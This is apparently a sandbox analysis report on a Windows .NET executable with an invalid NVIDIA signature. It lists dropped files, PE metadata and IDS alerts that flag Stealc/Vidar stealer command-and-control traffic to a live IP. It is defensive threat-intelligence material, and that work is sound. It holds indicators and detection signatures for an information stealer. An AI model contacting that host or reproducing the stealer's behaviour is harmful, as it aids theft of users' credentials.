                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):155648
                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):685392
                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):608080
                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):450024
                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2046288
                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):257872
                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):80880
                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:CSV text
                                                                                                      Category:modified
                                                                                                      Size (bytes):425
                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):263908
                                                                                                      Entropy (8bit):7.998846488868232
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CEJhujqDU1ByHguzD/FN56N4UV9qMuoTfXzksKk+3AwMQmBbsvsuikkAlrweSdvG:CQuuGQX/FN5CVU03+wwybsDV3SdO
                                                                                                      MD5:21504B52DAA4C04B619A19E6EDC54CD1
                                                                                                      SHA1:5F4F51F69B964DE390ADB06822D25164B6B77958
                                                                                                      SHA-256:5F701B9AAD60C098DC1D36FC83C660D67FFF172A4DEDB3DE351506FA435B152D
                                                                                                      SHA-512:52A55DAEA6755C80A1AD0855E1F65179AC58DCD7739EC3B49079C90312548FF9169024B82B5AA6D2DCD82F1644955DBC22D4BDD874396EDA92D3D8AF01D8544F
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):34725
                                                                                                      Entropy (8bit):5.398191594193763
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sw:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFx
                                                                                                      MD5:FFA0C2C2653004A67F8A1678D828B8E6
                                                                                                      SHA1:AC6B9B479F89228E7897D2D44C598049DD06618C
                                                                                                      SHA-256:413C48F24563569AFFF0CD7592D4F4A96D35DEBAFA0821CE552D7AB09C56F42D
                                                                                                      SHA-512:8E58AB3A95E64339C04170483EF13A75FA8826E02A6D72AEBE862CF3B013C42E6755DE8EB385C5F5AB03320461C4F3DBEB943613B1755B9CD513E6F6E35FBE3A
                                                                                                      Malicious:false
                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1048575
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:jhm:jQ
                                                                                                      MD5:80837145C2275170B37B751DDB80D102
                                                                                                      SHA1:F200F89D9A518CE937581F50D3DCCF584AE5F897
                                                                                                      SHA-256:591556B0A920AA3299E7AB5963E263F4B2F7A1DE7DBA2BF83579A878F2E306D0
                                                                                                      SHA-512:65AD041FFC6603C59A30254CC3726EE0AA1FF391C311C408A497BE42E86201A63049BC436CEB496EA60A40818653DA6A55CBE20D651C4FB29CF4C21E87C9CDE8
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):33
                                                                                                      Entropy (8bit):2.2845972159140855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:i6vvRyMivvRya:iKvHivD
                                                                                                      MD5:45B4C82B8041BF0F9CCED0D6A18D151A
                                                                                                      SHA1:B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
                                                                                                      SHA-256:7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
                                                                                                      SHA-512:B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
                                                                                                      Malicious:false
                                                                                                      Preview:0..1..2..3..4..0..1..2..3..4.....
                                                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.988867781346718
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:file.exe
                                                                                                      File size:413'224 bytes
                                                                                                      MD5:2cce29d734ea1d227b338834698e2de4
                                                                                                      SHA1:41700cd1bcf5f5bcca81ce722ed47fc17bd030c2
                                                                                                      SHA256:f75acf936390f89239c43552717efb65c4c3190b16a7eec62dcd0053a045e91d
                                                                                                      SHA512:ea0b440113a225764b38ae2526a10f7e4f3081e4a353e9831cf0e846ac7ba97ea7c2b4a12ab6fac5708a7855da8967f1b6bc661757dc68d819d11887a6af20b5
                                                                                                      SSDEEP:6144:O+0dGgr04h1LBuTmcYz43wUDPNvms5PYYzX3oYbEU6DsV4+1/QSyiZEO:30d/h1LBK13wUjx5QYTo0EUBVSS/EO
                                                                                                      TLSH:1E9423E704F10716CEE9323C54D26F3E8AF2D194912319FB82E756B69D7234A226C7C5
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x463c3e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows cui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x66F591C2 [Thu Sep 26 16:54:26 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                                      Subject Chain
                                                                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x63be8 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x5c8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x62800 | 0x2628 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x63ab0 | 0x1c | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x61c44 | 0x61e00 | 32747b246885c515d2a5dcbda6206f48 | False | 0.9938088681353767 | data | 7.99542204298472 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x64000 | 0x5c8 | 0x600 | db1daa9db276719b7dce2f7fee59adb7 | False | 0.4361979166666667 | data | 4.115782972549961 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x66000 | 0xc | 0x200 | 668ddc03321cdfb17f8be719cbc539e8 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x640a0 | 0x334 | data | | | 0.4426829268292683 |
| RT_MANIFEST | 0x643d8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-26T19:05:29.150702+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49716 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:30.312845+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49717 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:31.702222+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49718 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:33.104487+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49719 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:33.812539+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 5.75.211.162 | 443 | 192.168.2.5 | 49719 | TCP |
| 2024-09-26T19:05:34.982172+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49720 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:35.679915+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.5 | 49720 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:35.680099+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 5.75.211.162 | 443 | 192.168.2.5 | 49720 | TCP |
| 2024-09-26T19:05:36.445705+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49721 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:37.445668+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49722 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:40.833080+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49723 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:41.609248+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49724 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:42.783781+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49725 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:43.973906+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49726 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:45.731071+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49727 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:47.499648+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49728 | 5.75.211.162 | 443 | TCP |
| 2024-09-26T19:05:49.080817+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49729 | 5.75.211.162 | 443 | TCP |
